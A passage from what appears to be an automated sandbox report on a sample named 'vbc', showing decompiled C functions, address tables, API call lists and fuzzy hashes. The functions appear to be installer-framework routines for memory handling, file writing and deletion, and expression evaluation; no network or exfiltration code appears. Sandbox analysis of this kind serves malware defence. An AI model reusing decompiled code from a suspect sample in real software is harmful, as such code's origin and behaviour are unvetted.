                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E73192655() {
                                                				intOrPtr _t24;
                                                				void* _t26;
                                                				intOrPtr _t27;
                                                				signed int _t39;
                                                				void* _t40;
                                                				void* _t43;
                                                				intOrPtr _t44;
                                                				void* _t45;
                                                
                                                				_t40 = E731912BB();
                                                				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                				do {
                                                					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                					}
                                                					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                					if(_t39 <= 7) {
                                                						switch( *((intOrPtr*)(_t39 * 4 +  &M73192784))) {
                                                							case 0:
                                                								 *_t40 = 0;
                                                								goto L17;
                                                							case 1:
                                                								__eax =  *__eax;
                                                								if(__ecx > __ebx) {
                                                									 *(__esp + 0x10) = __ecx;
                                                									__ecx =  *(0x7319407c + __edx * 4);
                                                									__edx =  *(__esp + 0x10);
                                                									__ecx = __ecx * __edx;
                                                									asm("sbb edx, edx");
                                                									__edx = __edx & __ecx;
                                                									__eax = __eax &  *(0x7319409c + __edx * 4);
                                                								}
                                                								_push(__eax);
                                                								goto L15;
                                                							case 2:
                                                								__eax = E73191510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                								goto L16;
                                                							case 3:
                                                								__ecx =  *0x7319506c;
                                                								__edx = __ecx - 1;
                                                								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                								__eax =  *0x7319506c;
                                                								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                								goto L17;
                                                							case 4:
                                                								__eax = lstrcpynW(__edi,  *__eax,  *0x7319506c);
                                                								goto L17;
                                                							case 5:
                                                								_push( *0x7319506c);
                                                								_push(__edi);
                                                								_push( *__eax);
                                                								__imp__StringFromGUID2();
                                                								goto L17;
                                                							case 6:
                                                								_push( *__esi);
                                                								L15:
                                                								__eax = wsprintfW(__edi, 0x73195000);
                                                								L16:
                                                								__esp = __esp + 0xc;
                                                								goto L17;
                                                						}
                                                					}
                                                					L17:
                                                					_t26 =  *(_t43 + 0x14);
                                                					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                						GlobalFree(_t26);
                                                					}
                                                					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                					if(_t27 != 0) {
                                                						if(_t27 != 0xffffffff) {
                                                							if(_t27 > 0) {
                                                								E73191381(_t27 - 1, _t40);
                                                								goto L26;
                                                							}
                                                						} else {
                                                							E73191312(_t40);
                                                							L26:
                                                						}
                                                					}
                                                					_t44 = _t44 - 1;
                                                					_t43 = _t43 - 0x20;
                                                				} while (_t44 >= 0);
                                                				return GlobalFree(_t40);
                                                			}











                                                0x7319265f
                                                0x73192661
                                                0x73192665
                                                0x73192674
                                                0x73192678
                                                0x7319267d
                                                0x7319267d
                                                0x73192685
                                                0x7319268c
                                                0x73192692
                                                0x00000000
                                                0x73192699
                                                0x00000000
                                                0x00000000
                                                0x731926a1
                                                0x731926a5
                                                0x731926a8
                                                0x731926ac
                                                0x731926b3
                                                0x731926b7
                                                0x731926bd
                                                0x731926bf
                                                0x731926c1
                                                0x731926c1
                                                0x731926c8
                                                0x00000000
                                                0x00000000
                                                0x731926d1
                                                0x00000000
                                                0x00000000
                                                0x731926d8
                                                0x731926de
                                                0x731926e8
                                                0x731926ee
                                                0x731926f3
                                                0x00000000
                                                0x00000000
                                                0x73192714
                                                0x00000000
                                                0x00000000
                                                0x731926fa
                                                0x73192700
                                                0x73192701
                                                0x73192703
                                                0x00000000
                                                0x00000000
                                                0x7319271c
                                                0x7319271e
                                                0x73192724
                                                0x7319272a
                                                0x7319272a
                                                0x00000000
                                                0x00000000
                                                0x73192692
                                                0x7319272d
                                                0x7319272d
                                                0x73192732
                                                0x73192743
                                                0x73192743
                                                0x73192749
                                                0x7319274e
                                                0x73192753
                                                0x7319275f
                                                0x73192764
                                                0x00000000
                                                0x73192769
                                                0x73192755
                                                0x73192756
                                                0x7319276a
                                                0x7319276a
                                                0x73192753
                                                0x7319276b
                                                0x7319276c
                                                0x7319276f
                                                0x73192783

                                                APIs
                                                  • Part of subcall function 731912BB: GlobalAlloc.KERNELBASE(00000040,?,731912DB,?,7319137F,00000019,731911CA,-000000A0), ref: 731912C5
                                                • GlobalFree.KERNEL32(?), ref: 73192743
                                                • GlobalFree.KERNEL32(00000000), ref: 73192778
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680955467.0000000073191000.00000020.00000001.01000000.00000004.sdmp, Offset: 73190000, based on PE: true
                                                • Associated: 00000004.00000002.680948427.0000000073190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680961588.0000000073194000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680965648.0000000073196000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73190000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 90450496ab74d9687d9f455d3c03f8cefdeb2944e397499eab5d656aa3bf4f22
                                                • Instruction ID: fb073cafb4ed3769f5cc3d43a8427714426d6f53886c17574a0a8312201a7ad7
                                                • Opcode Fuzzy Hash: 90450496ab74d9687d9f455d3c03f8cefdeb2944e397499eab5d656aa3bf4f22
                                                • Instruction Fuzzy Hash: 0131D0725041CDDFE72EAF51CC94E6A77BAFB9630032B41A8F105B3550CB315846CB6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00402950(int __ebx, void* __eflags) {
                                                				WCHAR* _t26;
                                                				void* _t29;
                                                				long _t37;
                                                				int _t49;
                                                				void* _t52;
                                                				void* _t54;
                                                				void* _t56;
                                                				void* _t59;
                                                				void* _t60;
                                                				void* _t61;
                                                
                                                				_t49 = __ebx;
                                                				_t52 = 0xfffffd66;
                                                				_t26 = E00402DA6(0xfffffff0);
                                                				_t55 = _t26;
                                                				 *(_t61 - 0x40) = _t26;
                                                				if(E00405E83(_t26) == 0) {
                                                					E00402DA6(0xffffffed);
                                                				}
                                                				E00406008(_t55);
                                                				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                				 *(_t61 + 8) = _t29;
                                                				if(_t29 != 0xffffffff) {
                                                					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                					if( *(_t61 - 0x28) != _t49) {
                                                						_t37 =  *0x434f14;
                                                						 *(_t61 - 0x44) = _t37;
                                                						_t54 = GlobalAlloc(0x40, _t37);
                                                						if(_t54 != _t49) {
                                                							E004034E5(_t49);
                                                							E004034CF(_t54,  *(_t61 - 0x44));
                                                							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                							 *(_t61 - 0x10) = _t59;
                                                							if(_t59 != _t49) {
                                                								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                								while( *_t59 != _t49) {
                                                									_t60 = _t59 + 8;
                                                									 *(_t61 - 0x3c) =  *_t59;
                                                									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                									_t59 = _t60 +  *(_t61 - 0x3c);
                                                								}
                                                								GlobalFree( *(_t61 - 0x10));
                                                							}
                                                							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                							GlobalFree(_t54);
                                                							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                						}
                                                					}
                                                					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                					CloseHandle( *(_t61 + 8));
                                                				}
                                                				_t56 = 0xfffffff3;
                                                				if(_t52 < _t49) {
                                                					_t56 = 0xffffffef;
                                                					DeleteFileW( *(_t61 - 0x40));
                                                					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                				}
                                                				_push(_t56);
                                                				E00401423();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                				return 0;
                                                			}













                                                0x00402950
                                                0x00402952
                                                0x00402957
                                                0x0040295c
                                                0x0040295f
                                                0x00402969
                                                0x0040296d
                                                0x0040296d
                                                0x00402973
                                                0x00402980
                                                0x00402988
                                                0x0040298b
                                                0x00402997
                                                0x0040299a
                                                0x004029a0
                                                0x004029ae
                                                0x004029b3
                                                0x004029b7
                                                0x004029ba
                                                0x004029c3
                                                0x004029cf
                                                0x004029d3
                                                0x004029d6
                                                0x004029e0
                                                0x004029ff
                                                0x004029ec
                                                0x004029f4
                                                0x004029f7
                                                0x004029fc
                                                0x004029fc
                                                0x00402a06
                                                0x00402a06
                                                0x00402a13
                                                0x00402a19
                                                0x00402a1f
                                                0x00402a1f
                                                0x004029b7
                                                0x00402a33
                                                0x00402a35
                                                0x00402a35
                                                0x00402a3f
                                                0x00402a40
                                                0x00402a44
                                                0x00402a48
                                                0x00402a4e
                                                0x00402a4e
                                                0x00402a55
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                • CloseHandle.KERNEL32(?), ref: 00402A35
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E73191979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                				void* _v8;
                                                				signed int _v12;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				char _v76;
                                                				void _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                				signed int _t48;
                                                				signed int _t57;
                                                				signed int _t58;
                                                				signed int _t59;
                                                				signed int _t60;
                                                				signed int _t61;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t69;
                                                				void* _t70;
                                                				void* _t71;
                                                				signed int _t77;
                                                				void* _t81;
                                                				signed int _t83;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				void* _t101;
                                                
                                                				_t85 = __edx;
                                                				 *0x7319506c = _a8;
                                                				_t77 = 0;
                                                				 *0x73195070 = _a16;
                                                				_v12 = 0;
                                                				_v8 = E731912E3();
                                                				_t90 = E731913B1(_t42);
                                                				_t87 = _t85;
                                                				_t81 = E731912E3();
                                                				_a8 = _t81;
                                                				_t45 =  *_t81;
                                                				if(_t45 != 0x7e && _t45 != 0x21) {
                                                					_a16 = E731912E3();
                                                					_t77 = E731913B1(_t74);
                                                					_v12 = _t85;
                                                					GlobalFree(_a16);
                                                					_t81 = _a8;
                                                				}
                                                				_t46 =  *_t81 & 0x0000ffff;
                                                				_t101 = _t46 - 0x2f;
                                                				if(_t101 > 0) {
                                                					_t47 = _t46 - 0x3c;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                                                						if( *((short*)(_t81 + 2)) != 0x3c) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags > 0) {
                                                								L56:
                                                								_t48 = 0;
                                                								__eflags = 0;
                                                								L57:
                                                								asm("cdq");
                                                								L58:
                                                								_t90 = _t48;
                                                								_t87 = _t85;
                                                								L59:
                                                								E73191510(_t85, _t90, _t87,  &_v76);
                                                								E73191312( &_v76);
                                                								GlobalFree(_v8);
                                                								return GlobalFree(_a8);
                                                							}
                                                							if(__eflags < 0) {
                                                								L49:
                                                								__eflags = 0;
                                                								L50:
                                                								_t48 = 1;
                                                								goto L57;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 < _t77) {
                                                								goto L49;
                                                							}
                                                							goto L56;
                                                						}
                                                						_t85 = _t87;
                                                						_t48 = E73193050(_t90, _t77, _t85);
                                                						goto L58;
                                                					}
                                                					_t57 = _t47 - 1;
                                                					__eflags = _t57;
                                                					if(_t57 == 0) {
                                                						__eflags = _t90 - _t77;
                                                						if(_t90 != _t77) {
                                                							goto L56;
                                                						}
                                                						__eflags = _t87 - _v12;
                                                						if(_t87 != _v12) {
                                                							goto L56;
                                                						}
                                                						goto L49;
                                                					}
                                                					_t58 = _t57 - 1;
                                                					__eflags = _t58;
                                                					if(_t58 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                                                						if( *((short*)(_t81 + 2)) != 0x3e) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags < 0) {
                                                								goto L56;
                                                							}
                                                							if(__eflags > 0) {
                                                								goto L49;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 <= _t77) {
                                                								goto L56;
                                                							}
                                                							goto L49;
                                                						}
                                                						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                                                						_t85 = _t87;
                                                						_t59 = _t90;
                                                						_t83 = _t77;
                                                						if( *((short*)(_t81 + 4)) != 0x3e) {
                                                							_t48 = E73193070(_t59, _t83, _t85);
                                                						} else {
                                                							_t48 = E731930A0(_t59, _t83, _t85);
                                                						}
                                                						goto L58;
                                                					}
                                                					_t60 = _t58 - 0x20;
                                                					__eflags = _t60;
                                                					if(_t60 == 0) {
                                                						_t90 = _t90 ^ _t77;
                                                						_t87 = _t87 ^ _v12;
                                                						goto L59;
                                                					}
                                                					_t61 = _t60 - 0x1e;
                                                					__eflags = _t61;
                                                					if(_t61 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                                                						if( *((short*)(_t81 + 2)) != 0x7c) {
                                                							_t90 = _t90 | _t77;
                                                							_t87 = _t87 | _v12;
                                                							goto L59;
                                                						}
                                                						__eflags = _t90 | _t87;
                                                						if((_t90 | _t87) != 0) {
                                                							goto L49;
                                                						}
                                                						__eflags = _t77 | _v12;
                                                						if((_t77 | _v12) != 0) {
                                                							goto L49;
                                                						}
                                                						goto L56;
                                                					}
                                                					__eflags = _t61 == 0;
                                                					if(_t61 == 0) {
                                                						_t90 =  !_t90;
                                                						_t87 =  !_t87;
                                                					}
                                                					goto L59;
                                                				}
                                                				if(_t101 == 0) {
                                                					L21:
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) != 0) {
                                                						_v24 = E73192EE0(_t90, _t87, _t77, _v12);
                                                						_v20 = _t85;
                                                						_t48 = E73192F90(_t90, _t87, _t77, _v12);
                                                						_t81 = _a8;
                                                					} else {
                                                						_v24 = _v24 & 0x00000000;
                                                						_v20 = _v20 & 0x00000000;
                                                						_t48 = _t90;
                                                						_t85 = _t87;
                                                					}
                                                					__eflags =  *_t81 - 0x2f;
                                                					if( *_t81 != 0x2f) {
                                                						goto L58;
                                                					} else {
                                                						_t90 = _v24;
                                                						_t87 = _v20;
                                                						goto L59;
                                                					}
                                                				}
                                                				_t67 = _t46 - 0x21;
                                                				if(_t67 == 0) {
                                                					_t48 = 0;
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) != 0) {
                                                						goto L57;
                                                					}
                                                					goto L50;
                                                				}
                                                				_t68 = _t67 - 4;
                                                				if(_t68 == 0) {
                                                					goto L21;
                                                				}
                                                				_t69 = _t68 - 1;
                                                				if(_t69 == 0) {
                                                					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                                                					if( *((short*)(_t81 + 2)) != 0x26) {
                                                						_t90 = _t90 & _t77;
                                                						_t87 = _t87 & _v12;
                                                						goto L59;
                                                					}
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) == 0) {
                                                						goto L56;
                                                					}
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) == 0) {
                                                						goto L56;
                                                					}
                                                					goto L49;
                                                				}
                                                				_t70 = _t69 - 4;
                                                				if(_t70 == 0) {
                                                					_t48 = E73192EA0(_t90, _t87, _t77, _v12);
                                                					goto L58;
                                                				} else {
                                                					_t71 = _t70 - 1;
                                                					if(_t71 == 0) {
                                                						_t90 = _t90 + _t77;
                                                						asm("adc edi, [ebp-0x8]");
                                                					} else {
                                                						if(_t71 == 0) {
                                                							_t90 = _t90 - _t77;
                                                							asm("sbb edi, [ebp-0x8]");
                                                						}
                                                					}
                                                					goto L59;
                                                				}
                                                			}





























                                                0x73191979
                                                0x73191983
                                                0x7319198c
                                                0x7319198f
                                                0x73191994
                                                0x7319199d
                                                0x731919a6
                                                0x731919a8
                                                0x731919af
                                                0x731919b1
                                                0x731919b4
                                                0x731919bb
                                                0x731919c9
                                                0x731919d2
                                                0x731919d7
                                                0x731919da
                                                0x731919e0
                                                0x731919e0
                                                0x731919e3
                                                0x731919e6
                                                0x731919e9
                                                0x73191ab1
                                                0x73191ab1
                                                0x73191ab4
                                                0x73191b34
                                                0x73191b39
                                                0x73191b48
                                                0x73191b4b
                                                0x73191b53
                                                0x73191b53
                                                0x73191b53
                                                0x73191b55
                                                0x73191b55
                                                0x73191b56
                                                0x73191b56
                                                0x73191b58
                                                0x73191b5a
                                                0x73191b60
                                                0x73191b69
                                                0x73191b7a
                                                0x73191b85
                                                0x73191b85
                                                0x73191b4d
                                                0x73191b2f
                                                0x73191b2f
                                                0x73191b31
                                                0x73191b31
                                                0x00000000
                                                0x73191b31
                                                0x73191b4f
                                                0x73191b51
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191b51
                                                0x73191b3d
                                                0x73191b41
                                                0x00000000
                                                0x73191b41
                                                0x73191ab6
                                                0x73191ab6
                                                0x73191ab7
                                                0x73191b26
                                                0x73191b28
                                                0x00000000
                                                0x00000000
                                                0x73191b2a
                                                0x73191b2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191b2d
                                                0x73191ab9
                                                0x73191ab9
                                                0x73191aba
                                                0x73191af7
                                                0x73191afc
                                                0x73191b19
                                                0x73191b1c
                                                0x00000000
                                                0x00000000
                                                0x73191b1e
                                                0x00000000
                                                0x00000000
                                                0x73191b20
                                                0x73191b22
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191b24
                                                0x73191afe
                                                0x73191b03
                                                0x73191b05
                                                0x73191b07
                                                0x73191b09
                                                0x73191b12
                                                0x73191b0b
                                                0x73191b0b
                                                0x73191b0b
                                                0x00000000
                                                0x73191b09
                                                0x73191abc
                                                0x73191abc
                                                0x73191abf
                                                0x73191af0
                                                0x73191af2
                                                0x00000000
                                                0x73191af2
                                                0x73191ac1
                                                0x73191ac1
                                                0x73191ac4
                                                0x73191ad7
                                                0x73191adc
                                                0x73191ae9
                                                0x73191aeb
                                                0x00000000
                                                0x73191aeb
                                                0x73191ade
                                                0x73191ae0
                                                0x00000000
                                                0x00000000
                                                0x73191ae2
                                                0x73191ae5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191ae7
                                                0x73191ac7
                                                0x73191ac8
                                                0x73191ace
                                                0x73191ad0
                                                0x73191ad0
                                                0x00000000
                                                0x73191ac8
                                                0x731919ef
                                                0x73191a68
                                                0x73191a6a
                                                0x73191a6d
                                                0x73191a8b
                                                0x73191a8e
                                                0x73191a94
                                                0x73191a99
                                                0x73191a6f
                                                0x73191a6f
                                                0x73191a73
                                                0x73191a77
                                                0x73191a79
                                                0x73191a79
                                                0x73191a9c
                                                0x73191aa0
                                                0x00000000
                                                0x73191aa6
                                                0x73191aa6
                                                0x73191aa9
                                                0x00000000
                                                0x73191aa9
                                                0x73191aa0
                                                0x731919f1
                                                0x731919f4
                                                0x73191a59
                                                0x73191a5b
                                                0x73191a5d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191a63
                                                0x731919f6
                                                0x731919f9
                                                0x00000000
                                                0x00000000
                                                0x731919fb
                                                0x731919fc
                                                0x73191a32
                                                0x73191a37
                                                0x73191a4f
                                                0x73191a51
                                                0x00000000
                                                0x73191a51
                                                0x73191a39
                                                0x73191a3b
                                                0x00000000
                                                0x00000000
                                                0x73191a41
                                                0x73191a44
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191a4a
                                                0x731919fe
                                                0x73191a01
                                                0x73191a28
                                                0x00000000
                                                0x73191a03
                                                0x73191a03
                                                0x73191a04
                                                0x73191a18
                                                0x73191a1a
                                                0x73191a06
                                                0x73191a08
                                                0x73191a0e
                                                0x73191a10
                                                0x73191a10
                                                0x73191a08
                                                0x00000000
                                                0x73191a04

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680955467.0000000073191000.00000020.00000001.01000000.00000004.sdmp, Offset: 73190000, based on PE: true
                                                • Associated: 00000004.00000002.680948427.0000000073190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680961588.0000000073194000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680965648.0000000073196000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73190000_vbc.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: c2ef746db3d96b10e56476a9ee2d42f7849bb3db78e9b977d48e974345f20426
                                                • Instruction ID: 5dda810706e822266da67f1a29f4228749ac23d0274ff35e13a3d660747c1086
                                                • Opcode Fuzzy Hash: c2ef746db3d96b10e56476a9ee2d42f7849bb3db78e9b977d48e974345f20426
                                                • Instruction Fuzzy Hash: A351D132D001D8AFFB029FA484407ADBBBBAB44350F1B8179D407B3694E671AEC5879D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E73192480(void* __edx) {
                                                				void* _t37;
                                                				signed int _t38;
                                                				void* _t39;
                                                				void* _t41;
                                                				signed char* _t42;
                                                				signed char* _t51;
                                                				void* _t52;
                                                				void* _t54;
                                                
                                                				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                				while(1) {
                                                					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                					_t52 = _t51[0x18];
                                                					if(_t52 == 0) {
                                                						goto L9;
                                                					}
                                                					_t41 = 0x1a;
                                                					if(_t52 == _t41) {
                                                						goto L9;
                                                					}
                                                					if(_t52 != 0xffffffff) {
                                                						if(_t52 <= 0 || _t52 > 0x19) {
                                                							_t51[0x18] = _t41;
                                                							goto L12;
                                                						} else {
                                                							_t37 = E7319135A(_t52 - 1);
                                                							L10:
                                                							goto L11;
                                                						}
                                                					} else {
                                                						_t37 = E731912E3();
                                                						L11:
                                                						_t52 = _t37;
                                                						L12:
                                                						_t13 =  &(_t51[8]); // 0x1020
                                                						_t42 = _t13;
                                                						if(_t51[4] >= 0) {
                                                						}
                                                						_t38 =  *_t51 & 0x000000ff;
                                                						_t51[0x1c] = 0;
                                                						if(_t38 > 7) {
                                                							L27:
                                                							_t39 = GlobalFree(_t52);
                                                							if( *(_t54 + 0x10) == 0) {
                                                								return _t39;
                                                							}
                                                							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                							} else {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                							}
                                                							continue;
                                                						} else {
                                                							switch( *((intOrPtr*)(_t38 * 4 +  &M731925F8))) {
                                                								case 0:
                                                									 *_t42 = 0;
                                                									goto L27;
                                                								case 1:
                                                									__eax = E731913B1(__ebp);
                                                									goto L21;
                                                								case 2:
                                                									 *__edi = E731913B1(__ebp);
                                                									__edi[1] = __edx;
                                                									goto L27;
                                                								case 3:
                                                									__eax = GlobalAlloc(0x40,  *0x7319506c);
                                                									 *(__esi + 0x1c) = __eax;
                                                									__edx = 0;
                                                									 *__edi = __eax;
                                                									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7319506c, __eax,  *0x7319506c, 0, 0);
                                                									goto L27;
                                                								case 4:
                                                									__eax = E731912CC(__ebp);
                                                									 *(__esi + 0x1c) = __eax;
                                                									L21:
                                                									 *__edi = __eax;
                                                									goto L27;
                                                								case 5:
                                                									__eax = GlobalAlloc(0x40, 0x10);
                                                									_push(__eax);
                                                									 *(__esi + 0x1c) = __eax;
                                                									_push(__ebp);
                                                									 *__edi = __eax;
                                                									__imp__CLSIDFromString();
                                                									goto L27;
                                                								case 6:
                                                									if( *__ebp != __cx) {
                                                										__eax = E731913B1(__ebp);
                                                										 *__ebx = __eax;
                                                									}
                                                									goto L27;
                                                								case 7:
                                                									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                									( *(__esi + 0x18) - 1) *  *0x7319506c =  *0x73195074 + ( *(__esi + 0x18) - 1) *  *0x7319506c * 2 + 0x18;
                                                									 *__ebx =  *0x73195074 + ( *(__esi + 0x18) - 1) *  *0x7319506c * 2 + 0x18;
                                                									asm("cdq");
                                                									__eax = E73191510(__edx,  *0x73195074 + ( *(__esi + 0x18) - 1) *  *0x7319506c * 2 + 0x18, __edx,  *0x73195074 + ( *(__esi + 0x18) - 1) *  *0x7319506c * 2);
                                                									goto L27;
                                                							}
                                                						}
                                                					}
                                                					L9:
                                                					_t37 = E731912CC(0x73195044);
                                                					goto L10;
                                                				}
                                                			}











                                                0x73192494
                                                0x73192498
                                                0x731924a3
                                                0x731924a3
                                                0x731924aa
                                                0x731924af
                                                0x00000000
                                                0x00000000
                                                0x731924b3
                                                0x731924b6
                                                0x00000000
                                                0x00000000
                                                0x731924bb
                                                0x731924c6
                                                0x731924d6
                                                0x00000000
                                                0x731924cd
                                                0x731924cf
                                                0x731924e5
                                                0x00000000
                                                0x731924e5
                                                0x731924bd
                                                0x731924bd
                                                0x731924e6
                                                0x731924e6
                                                0x731924e8
                                                0x731924ec
                                                0x731924ec
                                                0x731924ef
                                                0x731924ef
                                                0x731924f7
                                                0x731924ff
                                                0x73192502
                                                0x731925c1
                                                0x731925c2
                                                0x731925cd
                                                0x731925f7
                                                0x731925f7
                                                0x731925dd
                                                0x731925e9
                                                0x731925df
                                                0x731925df
                                                0x731925df
                                                0x00000000
                                                0x73192508
                                                0x73192508
                                                0x00000000
                                                0x7319250f
                                                0x00000000
                                                0x00000000
                                                0x73192517
                                                0x00000000
                                                0x00000000
                                                0x73192525
                                                0x73192527
                                                0x00000000
                                                0x00000000
                                                0x73192548
                                                0x7319254e
                                                0x73192551
                                                0x73192553
                                                0x73192563
                                                0x00000000
                                                0x00000000
                                                0x73192530
                                                0x73192535
                                                0x73192538
                                                0x73192539
                                                0x00000000
                                                0x00000000
                                                0x7319256f
                                                0x73192575
                                                0x73192576
                                                0x73192579
                                                0x7319257a
                                                0x7319257c
                                                0x00000000
